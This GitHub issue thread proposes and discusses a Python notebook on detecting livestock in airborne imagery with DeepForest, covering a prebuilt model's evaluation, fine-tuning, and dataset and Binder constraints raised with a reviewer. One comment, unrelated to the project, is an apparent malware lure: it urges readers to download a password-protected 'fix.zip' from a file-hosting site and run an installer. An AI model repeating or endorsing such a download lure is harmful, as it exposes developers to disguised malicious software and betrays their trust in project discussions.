### ISSUE TITLE
[NBI] Live-stock detection (DeepForest)

### ISSUE THREAD

**Issue by camappel** [alan-turing-institute/environmental-ds-book#257]
## What is the notebook about?
This notebook will explore the capabilities of the [DeepForest](https://deepforest.readthedocs.io/en/latest/index.html) package. In particular, it will demonstrate how to:
- Detect live-stock in airborne imagery using the [prebuilt live-stock detection model](https://deepforest.readthedocs.io/en/latest/prebuilt.html#livestock-detectors)
- Evaluate the prebuilt model's performance before training
- Fine-tune the model using a [novel publicly-available dataset](https://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/N7GJYU)
- Evaluate the fine-tuned model's performance after training

The prebuilt live-stock model was trained on a [limited dataset](https://new.wildlabs.net/discussion/global-model-livestock-detection-airborne-imagery-data-applications-and-needs). According to the package's [documentation](https://deepforest.readthedocs.io/en/latest/training.html#training), "the prebuilt models will always be improved by adding data from the target area". As such, this notebook will explore the improvement in the model's performance in live-stock detection from fine-tuning on local data.

## Data Science Component
- [x] Exploration
- [x] Preprocessing
- [ ] Modelling
- [x] Post-processing
- [ ] Other (e.g. Reproducibility): 

## Submission type
- [x] Standard
- [ ] Special Issue
- [ ] Other (e.g. CI2023 Reproducibility Challenge):

## Programming language
- [x] Python
- [ ] R
- [ ] Julia
- [ ] Other:

## Checklist:
- [x] Input data, pipeline and/or model are public with license/citation
- [x] The proposed notebook reuses existing codebase
- [x] The proposed notebook uses open-source packages
- [x] The proposed notebook is associated to existing publication(s)

## Additional information
An EDS [notebook](https://edsbook.org/notebooks/gallery/15d986da-2d7c-44fb-af71-700494485def/notebook) already exists on tree crown detection using DeepForest. This notebook is different because it focusses on the latest version of DeepForest (1.4.0), which includes a new prebuilt live-stock model, and also demonstrates how to fine-tune the model.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by camappel** [comment]
Great, thanks! I'm going to use the same [PR](https://github.com/camappel/DeepForest/pull/1) as the last one since the environment will be similar

**Comment by acocac** [comment]
@camappel - LGTM. Please feel free to explore the `pooch` library (see [docs](https://www.fatiando.org/pooch/latest/)) for fetching the suggested labelled dataset.

**Comment by camappel** [comment]
Hi @acocac, I have a couple of questions about the capacity of the binder environment, and how to structure the notebook accordingly.

Currently in the notebook, I fetch and process a large dataset from dataverse, partition by train/validate/test, then fine-tune the livestock detection model on the train/validate sets. I then evaluate the baseline and fine-tuned models on the test set.

My questions are:
- Can I download the entire dataset in the notebook? I believe you previously said to just download a couple of sample images for visualisation, but the evaluation step requires a whole dataset to get the relevant metrics. Maybe instead, I could just download the test set (10%) in the notebook for the evaluation section?
- Can I train the model in the notebook? One [previous notebook](https://edsbook.org/notebooks/gallery/67a1e320-7c47-4ea9-8df8-e868326bc90b/notebook#train) included the training step, but [another](https://edsbook.org/notebooks/gallery/b34facfa-cea8-48f5-89f6-f11ce00812a9/notebook#load-the-model-and-its-pre-trained-weights) just downloaded the weights.

So I think the notebook structure will be:
Context
1. Setup environment
2. Download test data, baseline model, and fine-tuned model
3. Evaluation (baseline vs fine-tuned)
4. Visualisation

Please let me know your thoughts! Thanks

**Comment by acocac** [comment]
Hi @camappel - thanks for sharing updates!


> * Can I download the entire dataset in the notebook? I believe you previously said to just download a couple of sample images for visualisation, but the evaluation step requires a whole dataset to get the relevant metrics. Maybe instead, I could just download the test set (10%) in the notebook for the evaluation section?

The main notebook should only download the test set. You could archive it in Zenodo, and refer to the original dataset (and respective license) within the metadata/description of the zenodo repository (see for instance the [subset dataset](https://zenodo.org/records/6567018) used in the COSMOS-UK notebook).

> * Can I train the model in the notebook? One [previous notebook](https://edsbook.org/notebooks/gallery/67a1e320-7c47-4ea9-8df8-e868326bc90b/notebook#train) included the training step, but [another](https://edsbook.org/notebooks/gallery/b34facfa-cea8-48f5-89f6-f11ce00812a9/notebook#load-the-model-and-its-pre-trained-weights) just downloaded the weights. The problem with this, however, is that it does not demonstrate the training process, and I would like to show how to configure the model and create trainer (only a few lines of code).

I suggest adding a markdown cell where you highlight the training process (see an example [here](https://youtu.be/JNrepLxDRPQ)).

> So I think the notebook structure could be:
The structure looks good to me. Thanks for your effort in validating/sharing progress of your submission.

**Comment by acocac** [comment]
@camappel we have started the PRE-REVIEW phase. Fingers crossed for a constructive feedback of your submission!

**Comment by acocac** [comment]
Notebook was published via #262
